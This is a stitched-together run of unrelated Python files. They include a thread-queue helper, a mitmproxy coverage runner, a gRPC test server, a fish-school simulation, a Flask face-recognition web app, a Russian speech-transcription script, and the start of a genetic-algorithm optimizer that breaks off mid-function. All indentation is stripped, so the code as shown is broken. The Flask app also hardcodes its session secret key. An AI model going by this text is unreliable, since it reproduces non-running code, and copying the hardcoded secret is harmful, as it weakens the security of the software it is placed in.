unfinished_tasks = empty_queue(self._queue)
thread_errors = empty_queue(self._exc_queue)
if unfinished_tasks or thread_errors:
raise QueueNotEmptyException('The ThreadQueue did not finish all tasks',
unfinished_tasks, thread_errors)
LOG.debug('Closed all ThreadQueue threads')
def empty_queue(queue):
"""
:param Queue queue:
:return:
:rtype: list
"""
all_items = []
while True:
try:
all_items.append(queue.get_nowait())
except Empty:
return all_items
def _do_work(q, initialize_thread, worker, args, kwargs, cleanup_thread, exc_queue, response_queue):
try:
extra = None
if initialize_thread:
LOG.debug('Initializing thread')
extra = initialize_thread(*args, **kwargs)
else:
LOG.debug('Skipping thread initialization')
try:
_worker_loop(q, worker, response_queue,
extra=extra, has_extra=initialize_thread is not None)
finally:
if cleanup_thread is not None:
LOG.debug('Cleaning up thread')
if initialize_thread:
cleanup_thread(extra)
else:
cleanup_thread()
except Exception as exc:
LOG.warning('Exception in ThreadQueue thread', exc_info=True)
exc_queue.put(exc)
raise
def _worker_loop(queue, worker, response_queue, extra=None, has_extra=False):
while True:
item = queue.get()
try:
if item is None:
LOG.debug('Found break request from parent. Finishing work')
break
LOG.debug('Beginning task')
if has_extra:
resp = worker(extra, *item[0], **item[1])
else:
resp = worker(*item[0], **item[1])
response_queue.put(resp)
LOG.debug('Finished task')
queue.task_done()
except Exception as exc:
raise ThreadTaskException('An exception occurred while processing a task',
exc, task=item)
|
individual_coverage.py
|
#!/usr/bin/env python3
import io
import contextlib
import os
import sys
import glob
import multiprocessing
import configparser
import itertools
import pytest
def run_tests(src, test, fail):
stderr = io.StringIO()
stdout = io.StringIO()
with contextlib.redirect_stderr(stderr):
with contextlib.redirect_stdout(stdout):
e = pytest.main([
'-qq',
'--disable-pytest-warnings',
'--cov', src.replace('.py', '').replace('/', '.'),
'--cov-fail-under', '100',
'--cov-report', 'term-missing:skip-covered',
'-o', 'faulthandler_timeout=0',
test
])
if e == 0:
if fail:
print("FAIL DUE TO UNEXPECTED SUCCESS:", src, "Please remove this file from setup.cfg tool:individual_coverage/exclude.")
e = 42
else:
print(".")
else:
if fail:
print("Ignoring allowed fail:", src)
e = 0
else:
cov = [l for l in stdout.getvalue().split("\n") if (src in l) or ("was never imported" in l)]
if len(cov) == 1:
print("FAIL:", cov[0])
else:
print("FAIL:", src, test, stdout.getvalue(), stdout.getvalue())
print(stderr.getvalue())
print(stdout.getvalue())
sys.exit(e)
def start_pytest(src, test, fail):
# run pytest in a new process, otherwise imports and modules might conflict
proc = multiprocessing.Process(target=run_tests, args=(src, test, fail))
proc.start()
proc.join()
return (src, test, proc.exitcode)
def main():
c = configparser.ConfigParser()
c.read('setup.cfg')
fs = c['tool:individual_coverage']['exclude'].strip().split('\n')
no_individual_cov = [f.strip() for f in fs]
excluded = ['mitmproxy/contrib/', 'mitmproxy/test/', 'mitmproxy/tools/', 'mitmproxy/platform/']
src_files = glob.glob('mitmproxy/**/*.py', recursive=True)
src_files = [f for f in src_files if os.path.basename(f) != '__init__.py']
src_files = [f for f in src_files if not any(os.path.normpath(p) in f for p in excluded)]
ps = []
for src in sorted(src_files):
test = os.path.join("test", os.path.dirname(src), "test_" + os.path.basename(src))
if os.path.isfile(test):
ps.append((src, test, src in no_individual_cov))
result = list(itertools.starmap(start_pytest, ps))
if any(e != 0 for _, _, e in result):
sys.exit(1)
pass
if __name__ == '__main__':
main()
|
grpcserver.py
|
import grpc
from concurrent import futures
from google.protobuf import json_format
import threading
import base64
def grpc_server(pb2, pb2_grpc):
class OpenapiServicer(pb2_grpc.OpenapiServicer):
def __init__(self):
super(OpenapiServicer, self).__init__()
def SetConfig(self, request, context):
response_400 = """
{
"status_code_400" : {
"errors" : ["invalid value"]
}
}
"""
response_200 = """
{
"status_code_200" : "%s"
}
""" % base64.b64encode(
b"success"
).decode(
"utf-8"
)
test = request.prefix_config.l.integer
if test is not None and (test < 10 or test > 90):
res_obj = json_format.Parse(response_400, pb2.SetConfigResponse())
else:
res_obj = json_format.Parse(response_200, pb2.SetConfigResponse())
return res_obj
def start(self):
self._web_server_thread = threading.Thread(target=local_web_server)
self._web_server_thread.setDaemon(True)
self._web_server_thread.start()
return self
def local_web_server():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
pb2_grpc.add_OpenapiServicer_to_server(OpenapiServicer(), server)
print("Starting server. Listening on port 50051.")
server.add_insecure_port("[::]:50051")
server.start()
return OpenapiServicer()
|
turing_learning.py
|
import numpy as np
import matplotlib.pyplot as plt
import threading
import math
from channel import Channel
from environment import Environment
from replica_fish import ReplicaFish
from DelightFish import Fish
from observer import Observer
from utils import generate_distortion, generate_fish, generate_replica_fish, generate_all_fish, run_simulation
from interaction import Interaction
from environment import Environment
def test_simulation(
fish,
observer,
run_time=5,
):
"""Run a simulation and format data from it for use by classifiers
Arguments:
fish {list} -- List of fish instances
observer {Observer} -- Observer instance
Keyword Arguments:
run_time {number} -- Total run time in seconds (default: {5})
"""
def stop():
for f in fish:
f.stop()
observer.stop()
# Start the fish
fish_threads = []
for f in fish:
threading.Thread(target=f.start).start()
observer_thread = threading.Thread(target=observer.start)
observer_thread.start()
# Wait for the simulation to end, so data can be collected
# from the observer
fish_matrixes = []
threading.Timer(run_time, stop).start()
observer_thread.join()
# merge each fish's linear speed, angular speed, and neighbor
# distances into a single matrix. This will
# utlimately be a N x (N + 1) matrix, where N is the number
# of fish.
for fish_index in range(observer.num_nodes):
single_fish = np.column_stack((observer.lin_speed[fish_index],
observer.ang_speed[fish_index],
observer.neighbor_distances[fish_index]))
fish_matrixes.append(single_fish)
return np.stack(fish_matrixes, axis = 0)
def run_full_test(weights,
conn_threshold,
run_time,
total_fish,
k_ar,
max_speed,
arena_size,
real = False):
"""
Start and run a simulation and collect data for Turing Learning. This function
initializes other objects needed for simulation, rather than just
starting and stopping everything
Arguments:
weights {float|list} --- weights used by Neural Network in imposter fish
conn_threshold {float} -- Distance at which fish can no longer detect other fish
run_time {int} -- Length of time to run simulation
total_fish {int} -- Number of fish to be in the school
k_ar {float} -- parameter for delight fish
max_speed {float} -- Max speed of a single fish
arena_size {int} -- boundaries of arena to create distortion
real {bool} -- Should this test have real or imposter fish (default : {False})
"""
arena_center = arena_size / 2.0
initial_spread = 20
fish_pos = initial_spread * np.random.rand(total_fish, 2) + arena_center - initial_spread / 2.0
clock_freqs = 1
verbose = False
distortion = generate_distortion(type='none', n=arena_size)
environment = Environment(
node_pos=fish_pos,
distortion=distortion,
prob_type='binary',
noise_magnitude=0,
conn_thres=conn_threshold,
verbose=verbose
)
interaction = Interaction(environment, verbose=verbose)
channel = Channel(environment)
# Have all real or all fake
if real:
n_fish = total_fish
n_replica_fish = 0
else:
n_fish = 0
n_replica_fish = total_fish
fish = generate_all_fish(
n_fish=n_fish,
n_replica_fish= n_replica_fish,
channel=channel,
interaction=interaction,
k_coh = 0,
k_ar = k_ar,
alpha = 40,
weights = weights,
lim_neighbors=[0, math.inf],
neighbor_weights=1.0,
fish_max_speeds=max_speed,
clock_freqs=clock_freqs,
verbose=verbose
)
channel.set_nodes(fish)
observer = Observer(fish=fish, environment=environment, channel=channel)
fish_matrix = test_simulation(fish=fish, observer=observer, run_time=run_time)
return fish_matrix
|
app.py
|
import db
import threading
import configparser
import detected
import json
from facerec import capture_faces
from flask import Flask, flash, redirect, render_template, request, jsonify
from time import sleep
from helpers import f_encode, camtest, init_db
from PIL import Image, ImageOps
from io import BytesIO
# Configure application
app = Flask(__name__)
app.secret_key = "kdug4fuergdffkhsgdgd"
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# DEFINE GLOBAL VARIABLES
# Get lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
# Reset shared global variables
detected.total_faces = 0
detected.face_ids.clear()
# make sure camera is configured "off"
config = configparser.ConfigParser()
config.read("config.ini")
config["facerec"]["active"] = "no"
with open("config.ini", "w") as f:
config.write(f)
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
@app.route("/", methods=["GET", "POST"])
def index():
""" Main Page """
# Get capture_faces status from .ini file
config.read("config.ini")
capture_active = config["facerec"].getboolean("active")
if request.method == "POST":
# Activate / deactivate capture_faces on button push
if request.form.get("on_off"):
on_off = request.form.get("on_off")
if on_off == "True":
config["facerec"]["active"] = "yes"
with open("config.ini", "w") as f:
config.write(f)
# Flash message
flash("Face recognition activated")
# Start capture_faces thread
capturethread = threading.Thread(target=capture_faces, args=(facelist, idlist))
capturethread.start()
#sleep(3)
elif on_off == "False":
# Change config to end capture_faces thread
config["facerec"]["active"] = "no"
with open("config.ini", "w") as f:
config.write(f)
# Flash message
flash("Face recognition deactivated")
sleep(2)
return redirect("/")
else:
return render_template("index.html", capture_active = capture_active)
@app.route("/no_of_faces")
def no_of_faces():
""" Return current number of faces detected """
return jsonify(faces = detected.total_faces)
@app.route("/people")
def people():
""" Return names of people detected """
namedict = {}
for id in detected.face_ids:
if not id == 0:
name = db.getname(id)
namedict[id]=name
return jsonify(namedict)
@app.route("/faces", methods=["GET", "POST"])
def faces():
""" Face Management """
global facelist
global idlist
if request.method == "POST":
# --- Adding a new face ---
if "add" in request.form:
# Verify name input
if not request.form.get("name"):
flash("Must provide name")
return redirect("/faces")
else:
name = request.form.get("name")
# Verify file was submitted
if not request.files["file"]:
flash("Must provide image file")
return redirect("/faces")
else:
try:
f = request.files["file"]
except:
flash("Error uploading file")
return redirect("/faces")
# Resize and rotate Image
try:
print("Processing Image...")
img = Image.open(f)
try:
#rotate accordingly
img = ImageOps.exif_transpose(img)
except:
pass
img.thumbnail((800, 800))
temp = BytesIO()
img.save(temp, format="png")
except:
flash("Error processing image")
return redirect("/faces")
# Try to generate face encoding
try:
facecode = f_encode(temp)
except:
flash("Invalid image file or could not detect any faces")
return redirect("/faces")
# Add new entry to database
try:
db.add(name, facecode)
except:
flash("Database error")
return redirect("/faces")
else:
flash("New face entry added")
# Update global lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
return redirect("/faces")
# --- Removing a face entry ---
elif "remove" in request.form:
# Get Id to remove
id = request.form.get("remove")
# Remove Id from database
try:
db.remove(id)
except:
flash("Error removing face from database")
return redirect("/faces")
else:
flash("Face entry removed from database")
# Update global lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
return redirect("/faces")
# --- Initialize Database ---
elif "initialize" in request.form:
return redirect("/initdb")
return redirect("/")
else:
users = []
users = db.getidnamelist()
return render_template("faces.html", users = users)
@app.route("/initdb", methods=["GET", "POST"])
def initdb():
""" Initialize DB """
global facelist
global idlist
if request.method == "POST":
if "cancel" in request.form:
return redirect("/faces")
elif "initialize" in request.form:
try:
init_db()
except:
flash("Error trying to initialize the database")
return redirect("/initdb")
else:
# Update global lists of known face encodings and ids from database
facelist = db.getfacelist()
idlist = db.getidlist()
flash("Database initialized")
return redirect("/faces")
else:
return render_template("initdb.html")
@app.route("/settings", methods=["GET", "POST"])
def settings():
""" Settings """
if request.method == "POST":
# --- Save settings to config.ini ---
if "save" in request.form:
config["picam"]["resolution_x"] = request.form.get("resolution_x")
config["picam"]["resolution_y"] = request.form.get("resolution_y")
config["picam"]["rotation"] = request.form.get("rotation")
config["picam"]["hflip"] = request.form.get("hflip")
with open("config.ini", "w") as f:
config.write(f)
flash("Camera settings saved")
return redirect("/settings")
# --- Run camera preview ---
elif "test" in request.form:
camtest()
return redirect("/settings")
else:
return redirect("/settings")
else:
# Read Pi Cam settings
config.read("config.ini")
camcfg = {}
for name,value in config.items("picam"):
camcfg[name] = value
print(camcfg)
return render_template("settings.html", cam = camcfg)
if __name__ == "__main__":
app.run()
|
audio_transcribe.py
|
# Audio Transcriptor
# This script will create the folder structure in the same manner as LJSpeech-1.1 dataset.
# This script will splitt the audio files on silenses and send the audio chunks to google recognition service
# Google will return the recognized text.
# This text will be writen to metadata.csv in the same manner as in LJSpeech-1.1 dataset.
# The audio chunks will also be saved in the same manner as in LJSpeech-1.1 dataset.
# This script must be in the same folder with audio files that should be transcripted
# The names of the audio files must be as follows: 01.mp3, 02.mp3, ..., 99.mp3 (or) 01.wav, 02.wav, ..., 99.wav
# To work with mp3-files you will need to install ffmpeg and put it to PATH.
# Windows instruction here http://blog.gregzaal.com/how-to-install-ffmpeg-on-windows/
import argparse
import json
import logging
import sys
from multiprocessing import Semaphore, Process
from pathlib import Path
import speech_recognition as sr
from pydub import AudioSegment, effects
from pydub.silence import split_on_silence
from bert.bert_punctuation import BertPunctuation # https://github.com/vlomme/Bert-Russian-punctuation don't forget to download pretrained bert model https://drive.google.com/file/d/190dLqhRjqgNJLKBqz0OxQ3TzxSm5Qbfx/view
from normalizer.normalizer import Normalizer # https://github.com/snakers4/russian_stt_text_normalization
# Settings
SOURCE_FORMAT = 'mp3' # or 'wav' format of source audio file.
SYMBOLS_GATE = False # only chunks with normal symbol rate (symbols per second) will be used
SYMBOL_RATE_MIN = 13 # min amount of symbols per second audio
SYMBOL_RATE_MAX = 30 # max amount of symbols per second audio
ADDITIONAL_CLEAN = True # before use chunk will be send to google cloud, if google can not recognize words in this chunk, it will be not used. True will consume additional time.
MIN_SILENCE_LEN = 300 # silence duration for cut in ms. If the speaker stays silent for longer, increase this value. else, decrease it.
SILENCE_THRESH = -36 # consider it silent if quieter than -36 dBFS. Adjust this per requirement.
KEEP_SILENCE = 100 # keep some ms of leading/trailing silence.
FRAME_RATE = 16000 # set the framerate of result audio.
TARGET_LENGTH = 1000 # min target length of output audio files in ms.
PUNCTUATION = False # will add commas in text. Set it to False if you use other language as russian.
PROCESSES_NUM = 5 # Parallel processes
LOG_DIR = Path(__file__).parent / 'logs'
LOG_DIR.mkdir(exist_ok=True)
PROGRESS_FILE = Path('progress.json')
def config_logger(name: str, filename: str) -> logging.Logger:
"""Configure logger"""
logger = logging.getLogger()
logger.setLevel(logging.INFO)
logger.handlers = []
formatter = logging.Formatter(f'{name}: %(message)s')
fh = logging.FileHandler(LOG_DIR / f'{filename}.log', encoding='utf-8')
fh.setLevel(logging.INFO)
fh.setFormatter(formatter)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.addHandler(fh)
return logger
def silence_based_conversion(input_audio: Path, output_dir: Path, start_index: int) -> int:
"""function that splits the audio file into chunks and applies speech recognition"""
author = input_audio.parent.parts[-1]
rel_input = input_audio.relative_to(input_audio.parents[1])
logger = config_logger(str(rel_input), str(author))
try:
progress = json.loads(PROGRESS_FILE.read_text(encoding='utf-8'))
if progress.get(str(rel_input)):
logger.info('Already processed, skipping')
return progress.get(str(rel_input))
except FileNotFoundError:
pass
# open the audio file stored in the local system
if SOURCE_FORMAT == 'wav':
logger.info('Opening')
song = AudioSegment.from_wav(input_audio)
else:
logger.info('Converting to WAV')
song = AudioSegment.from_file(input_audio, 'mp3')
song = song.set_channels(1)
# set the framerate of result autio
song = song.set_frame_rate(FRAME_RATE)
# split track where silence is 0.5 seconds or more and get chunks
logger.info('Splitting to chunks')
chunks = split_on_silence(song, MIN_SILENCE_LEN, SILENCE_THRESH, KEEP_SILENCE)
# create a directory to store output files
splitted = output_dir / author
if splitted.exists():
logger.info('Conversion was aborted. Continue...')
splitted.mkdir(exist_ok=True, parents=True)
chunk_file = splitted / 'check_temp.wav'
temp_file = splitted / 'temp.wav'
metadata_file = splitted / 'metadata.csv'
# additional clean. Use it if you want to remove chunks without speech.
if ADDITIONAL_CLEAN:
checked_chunks = [chunks[0]]
# check each chunk
for chunk in chunks:
# Create 1000 milliseconds silence chunk
# Silent chunks (1000ms) are needed for correct working google recognition
chunk_silent = AudioSegment.silent(duration=1000)
# Add silent chunk to beginning and end of audio chunk.
# This is done so that it doesn't seem abruptly sliced.
# We will send this chunk to google recognition service
audio_chunk_temp = chunk_silent + chunk + chunk_silent
# specify the bitrate to be 192k
# save chunk for google recognition as temp.wav
audio_chunk_temp.export(chunk_file, bitrate='192k', format='wav')
# create a speech recognition object
r = sr.Recognizer()
# recognize the chunk
with sr.AudioFile(str(chunk_file)) as source:
# remove this if it is not working correctly.
r.adjust_for_ambient_noise(source)
audio_listened = r.listen(source)
try:
# try converting it to text
# if you use other language as russian, correct the language as described here https://cloud.google.com/speech-to-text/docs/languages
r.recognize_google(audio_listened, language='ru-RU')
checked_chunks.append(chunk)
logger.info('checking chunk - passed')
except sr.UnknownValueError:
logger.info('checking chunk - not passed')
except sr.RequestError:
logger.info('--- Could not request results. check your internet connection')
# finaly remove the temp-file
chunk_file.unlink()
chunks = checked_chunks
# now recombine the chunks so that the parts are at least "target_length" long
output_chunks = [chunks[0]]
for chunk in chunks[1:]:
if len(output_chunks[-1]) < TARGET_LENGTH:
output_chunks[-1] += chunk
else:
output_chunks.append(chunk)
chunks = output_chunks
logger.info(f'Found {len(chunks)} chunks')
# Load pretrained models
norm = Normalizer()
# process each chunk
for counter, chunk in enumerate(chunks, start_index):
output_file = splitted / f'{author}_{counter:04d}.wav'
if output_file.exists():
logger.info(f'{output_file.relative_to(splitted)} already processed, skipping.')
continue
# Create 1000 milliseconds silence chunk
# Silent chunks (1000ms) are needed for correct working google recognition
chunk_silent = AudioSegment.silent(duration=1000)
# Add silent chunk to beginning and end of audio chunk.
# This is done so that it doesn't seem abruptly sliced.
# We will send this chunk to google recognition service
audio_chunk_temp = chunk_silent + chunk + chunk_silent
# This chunk will be stored
audio_chunk = chunk
# export audio chunk and save it in the current directory.
# normalize the loudness in audio
audio_chunk = effects.normalize(audio_chunk)
# specify the bitrate to be 192k
# save chunk for google recognition as temp.wav
audio_chunk_temp.export(temp_file, bitrate='192k', format='wav')
logger.info(f'Processing {output_file.relative_to(splitted)}')
# create a speech recognition object
r = sr.Recognizer()
# recognize the chunk
with sr.AudioFile(str(temp_file)) as source:
# remove this if it is not working correctly.
r.adjust_for_ambient_noise(source)
audio_listened = r.listen(source)
try:
# try converting it to text
# if you use other language as russian, correct the language as described here https://cloud.google.com/speech-to-text/docs/languages
rec = r.recognize_google(audio_listened, language='ru-RU').lower()
# google recognition return numbers as integers i.e. "1, 200, 35".
# text normalization will read this numbers and return this as a writen russian text i.e. "один, двести, тридцать пять"
# if you use other language as russian, repalce this line
rec = norm.norm_text(rec)
# bert punctuation - will place commas in text
if PUNCTUATION:
rec = [rec]
rec = BertPunctuation().predict(rec)
rec = (rec[0])
audio_length_ms = len(audio_chunk) # in milliseconds
audio_length_sec = float(len(audio_chunk)) / 1000 # in seconds
symbol_count = float(len(rec))
# here starts the filtering on symbol rate
if SYMBOLS_GATE:
if (symbol_count / audio_length_sec > SYMBOL_RATE_MIN) and (symbol_count / audio_length_sec < SYMBOL_RATE_MAX):
rate = int(symbol_count / audio_length_sec)
logger.info(f'Symbol rate {rate}')
# write the output to the metadata.csv.
with metadata_file.open(mode='a+', encoding='utf=8') as f:
f.write(f'{output_file.name}|{rec}|{rec}|{rate}|{audio_length_ms}\n')
# save audio file & update progress
audio_chunk.export(output_file, bitrate='192k', format='wav')
else:
logger.info('- text too short or too long')
else:
# write the output to the metadata.csv.
with metadata_file.open(mode='a+', encoding='utf=8') as f:
f.write(f'{output_file.name}|{rec}|{rec}\n')
# save audio file & update progress
audio_chunk.export(output_file, bitrate='192k', format='wav')
# catch any errors. Audio files with errors will be not mentioned in metadata.csv
except sr.UnknownValueError:
logger.info('-- Could not understand audio')
except sr.RequestError:
logger.info('--- Could not request results. Check your internet connection')
# finaly remove the temp-file
temp_file.unlink()
try:
progress = json.loads(PROGRESS_FILE.read_text(encoding='utf-8'))
except FileNotFoundError:
progress = {}
progress[str(rel_input)] = len(chunks)
PROGRESS_FILE.write_text(json.dumps(progress, ensure_ascii=False, indent=4), encoding='utf-8')
return progress[str(rel_input)]
def process_dir(directory: Path, output_dir: Path, semaphore: Semaphore):
"""Process all audio files in directory"""
with semaphore:
last_index = 0
for audio_file in directory.glob(f'*.{SOURCE_FORMAT}'):
last_index = silence_based_conversion(audio_file, output_dir, last_index + 1)
def main():
"""Main function"""
parser = argparse.ArgumentParser()
parser.add_argument('input_dir', help='Input dir')
parser.add_argument('output_dir', help='Output dir')
args = parser.parse_args()
# get dirs to process
output_dir = Path(args.output_dir)
semaphore = Semaphore(PROCESSES_NUM)
all_processes = []
for author in Path(args.input_dir).glob('*'):
if author.is_dir():
p = Process(target=process_dir, args=(author, output_dir, semaphore))
all_processes.append(p)
p.start()
for p in all_processes:
p.join()
if __name__ == '__main__':
main()
|
run_optimization.py
|
"""This is the core of the genetic algorithm (GA) used for optimization.
It uses the `NSGA-II <https://www.sciencedirect.com/science/article/pii/S1877705811022466>`_
algorithm for multi-objective optimization of smooth components.
**********
How to use
**********
To use, call run_optimization with a configuration dictionary and your smooth model.
You will receive a list of :class:`Individual` in return. These individuals are
pareto-optimal in regard to the given objective functions (limited to two functions).
An example configuration can be seen in run_optimization_example in the
`examples directory <https://github.com/rl-institut/smooth/tree/dev/smooth/examples>`_.
Objective functions
-------------------
You may specify your custom objective functions for optimization.
These should be lambdas that take the result from run_smooth and return a value.
Keep in mind that this algorithm always tries to maximize.
In order to minimize a value, return the negative value.
Example 1: maximize *power_max* of the first component::
lambda x: x[0].power_max
Example 2: minimize the annual costs::
lambda x: -sum([component.results['annuity_total'] for component in x])
Result
------
After the given number of generations or aborting, the result is printed to the terminal.
All individuals currently on the pareto front are returned in a list.
Their `values` member contain the component attribute values in the order
given by the `attribute_variation` dictionary from the optimization params.
In addition, when `SAVE_ALL_SMOOTH_RESULTS` is set to True, the `smooth_result`
member of each individual contains the value returned by run_smooth.
.. warning::
Using SAVE_ALL_SMOOTH_RESULTS and writing the result
to a file will generally lead to a large file size.
**************
Implementation
**************
Like any GA, this implementation simulates a population which converges
to an optimal solution over multiple generations.
As there are multiple objectives, the solution takes the form of a pareto-front,
where no solution is dominated by another while maintaining distance to each other.
We take care to compute each individual configuration only once.
The normal phases of a GA still apply:
* selection
* crossover
* mutation
Population initialisation
-------------------------
At the start, a population is generated.
The size of the population must be declared (`population_size`).
Each component attribute to be varied in the smooth_model corresponds
to a gene in an individual. The genes are initialized randomly with a uniform
distribution between the minimum and maximum value of its component attribute.
These values may adhere to a step size (*val_step* in :class:`AttributeVariation`).
Selection
---------
We compute the fitness of all individuals in parallel.
You must set `n_core` to specify how many threads should be active at the same time.
This can be either a number or 'max' to use all virtual cores on your machine.
The fitness evaluation follows these steps:
#. change your smooth model according to the individual's component attribute values
#. run smooth
#. on success, compute the objective functions using the smooth result. \
These are the fitness values. On failure, print the error
#. update the master individual on the main thread with the fitness values
#. update the reference in the dictionary containing all evaluated individuals
After all individuals in the current generation have been evaluated,
they are sorted into tiers by NSGA-II fast non-dominated sorting algorithm.
Only individuals on the pareto front are retained,
depending on their distance to their neighbors.
The parent individuals stay in the population, so they can appear in the pareto front again.
Crossover
---------
These individuals form the base of the next generation, they are parents.
For each child in the next generation, genes from two randomly selected parents
are taken (uniform crossover of independent genes).
Mutation
--------
After crossover, each child has a random number of genes mutated.
The mutated value is around the original value, taken from a normal distribution.
Special care must be taken to stay within the component atrribute's range
and to adhere to a strict step size.
After crossover and mutation, we check that this individual's gene sequence
has not been encountered before (as this would not lead to new information
and waste computing time). Only then is it admitted into the new generation.
Special cases
-------------
We impose an upper limit of 1000 * `population_size` on the number of tries to
find new children. This counter is reset for each generation. If it is exceeded
and no new gene sequences have been found, the algorithm aborts and returns the current result.
In case no individuals have a valid smooth result, an entirely new population is generated.
No plot will be shown.
If only one individual is valid, the population is filled up with random individuals.
Gradient ascent
---------------
The solutions of the GA are pareto-optimal, but may not be at a local optimum.
Although new configurations to be evaluated are searched near the current ones,
it is not guaranteed to find slight improvements.
This is especially true if there are many dimensions to search
and the change is in only one dimension.
The chance to happen upon this single improvement is in
inverse proportion to the number of attribute variations.
Therefore, the *post_processing* option exists to follow the
fitness gradient for each solution after the GA has finished.
We assume that each attribute is independent of each other.
All solutions improve the same attribute at the same time.
The number of fitness evaluations may exceed the *population_size*,
however, the maximum number of cores used stays the same as before.
To find the local optimum of a single attribute of a solution,
we first have to find the gradient.
This is done by going one *val_step* in positive and negative direction.
These new children are then evaluated. Depending on the domination,
the gradient may be *+val_step*, -*val_step* or 0 (parent is optimal).
Then, this gradient is followed until the child shows no improvement.
The population may be topped up with multiples of *val_step*
to better utilize all cores and speed up the gradient ascent.
After all solutions have found their optimum for this attribute,
the next attribute is varied.
Plotting
--------
To visualize the current progress,
you can set the *plot_progress* simulation parameter to True.
This will show the current pareto front in a pyplot window.
You can mouse over the points to show the configuration and objective values.
To keep the computation running in the background (non-blocking plots)
while listening for user events, the plotting runs in its own process.
On initialisation, a one-directional pipe is established to send data
from the main computation to the plotting process.
The process is started right at the end of the initialisation.
It needs the attribute variations and objective names for hover info and axes labels.
It also generates a multiprocessing event which checks if the process shall be stopped.
In the main loop of the process, the pipe is checked for any new data.
This incorporates a timeout to avoid high processor usage.
If new data is available, the old plot is cleared
(along with any annotations, labels and titles) and redrawn from scratch.
In any case, the window listens for a short time for user input events like mouseover.
Window close is a special event which stops the process,
but not the computation (as this runs in the separate main process).
When hovering with the mouse pointer over a point in the pareto front,
an annotation is built with the info of the :class:`Individual`.
The annotation is removed when leaving the point. A simple example
of how this looks is illustrated in Figure 1. In this example,
after the first generation there is one optimal energy system
found which costs 244,416.21 EUR and produces 0 emissions.
.. figure:: /images/pareto_annotation.png
:width: 60 %
:alt: pareto_annotation.png
:align: center
Fig.1: Simple diagram of a pareto front with annotations
Sending None through the pipe makes the process show the plot until the user closes it.
This blocks the process, so no new data is received, but user events are still processed.
"""
import multiprocessing as mp
from tkinter import TclError # plotting window closed
import random
import matplotlib.pyplot as plt # only needed when plot_progress is set
import os # delete old result files
from datetime import datetime # get timestamp for filename
import pickle # pickle intermediate results
import dill # dump objective functions
from smooth import run_smooth
# import traceback
# def tb(e):
# traceback.print_exception(type(e), e, e.__traceback__)
class AttributeVariation:
"""Class that contains all information about an attribute that is varied by the genetic algorithm
:param comp_name: name of component that gets varied
:type comp_name: string
:param comp_attribute: component attribute that gets varied
:type comp_attribute: string
:param val_min: minimum value of component attribute
:type val_min: number
:param val_max: maximum value of component attribute (inclusive)
:type val_max: number
:param val_step: step size of component attribute
:type val_step: number, optional
:var num_steps: number of steps if *val_step* is set and not zero
:type num_steps: int
:raises: AssertionError when any non-optional parameter is missing or *val_step* is negative
"""
def __init__(self, iterable=(), **kwargs):
self.val_step = None
self.__dict__.update(iterable, **kwargs)
assert hasattr(self, "comp_name"), "comp_name missing"
assert hasattr(self, "comp_attribute"), "{}: comp_attribute missing".format(self.comp_name)
assert hasattr(
self, "val_min"), "{} - {}: val_min missing".format(self.comp_name, self.comp_attribute)
assert hasattr(
self, "val_max"), "{} - {}: val_max missing".format(self.comp_name, self.comp_attribute)
if self.val_step == 0:
print("{} - {}: ignore val_step".format(self.comp_name, self.comp_attribute))
if self.val_step:
assert self.val_step >= 0, "{} - {}: val_step < 0".format(
self.comp_name, self.comp_attribute)
self.num_steps = int((self.val_max - self.val_min)/self.val_step) + 1
class Individual:
""" Class for individuals evaluated by the genetic algorithm
:param values: attribute values (individual configuration)
:type values: list
:var values: given values
:var fitness: fitness values depending on objective functions
:type fitness: tuple
:var smooth_result: result from `run_smooth`
"""
class IndividualIterator:
"""Class to iterate over gene values.
"""
def __init__(self, individual):
self._idx = 0
self.individual = individual
def __next__(self):
try:
return self.individual.values[self._idx]
except IndexError:
raise StopIteration
finally:
self._idx += 1
values = None # list. Take care when copying.
fitness = None # tuple
smooth_result = None # result of run_smooth
def __init__(self, values):
self.values = values
def __str__(self):
return str(self.values)
# enable iteration over values
def __iter__(self):
return self.IndividualIterator(self)
def __len__(self):
return len(self.values)
# access values directly
def __getitem__(self, idx):
return self.values[idx]
def __setitem__(self, idx, value):
self.values[idx] = value
def dominates(self, other):
"""Define dominance between individuals
:param other: individual for comparison
:type other: :class:`Individual`
:return: True if both fitness values are greater or
one is greater while the other is equal. False otherwise.
:rtype: boolean
"""
return self.fitness is not None and (other.fitness is None or (
(self.fitness[0] >= other.fitness[0] and self.fitness[1] > other.fitness[1]) or
(self.fitness[0] > other.fitness[0] and self.fitness[1] >= other.fitness[1])))
def sort_by_values(n, values):
"""Sort values
:param values: values to sort
:type values: iterable
:param n: maximum number of returned values
:type n: int
:return: list of indices that correspond to the values sorted in ascending order, `n` maximum
:rtype: list
"""
return [i for e, i in sorted((e, i) for i, e in enumerate(values))][:n]
def fast_non_dominated_sort(p):
"""NSGA-II's fast non dominated sort
:param p: values to sort
:type p: iterable
:return: indices of values sorted into their domination ranks (only first element used)
:rtype: list of lists of indices
"""
S = [[] for _ in p] # which values dominate other?
front = [[]] # group values by number of dominations
n = [0]*len(p) # how many values does the value at this position dominate?
# rank = [0]*len(p) # rank within domination tree (unused)
# compare all elements, see which ones dominate each other
for i in range(0, len(p)):
for j in range(0, len(p)):
if p[i].dominates(p[j]) and j not in S[i]:
S[i].append(j)
elif p[j].dominates(p[i]):
n[i] += 1
if n[i] == 0:
# element is not dominated: put in front
# rank[i] = 0
if i not in front[0]:
front[0].append(i)
i = 0
while(len(front[i]) > 0):
Q = []
for p in front[i]:
for q in S[p]:
n[q] -= 1
if n[q] == 0:
# rank[q] = i+1
if q not in Q:
Q.append(q)
i = i+1
front.append(Q)
if len(front) > 1:
front.pop(len(front) - 1)
return front
def CDF(values1, values2, n):
"""Calculate crowding distance
:param values1: values in first dimension
:type values1: iterable
:param values2: values in second dimension
:type values2: iterable
:param n: maximum number of values
:type n: int
:return: `n` crowding distance values
:rtype: list
"""
if (n == 0 or len(values1) != n or len(values2) != n or
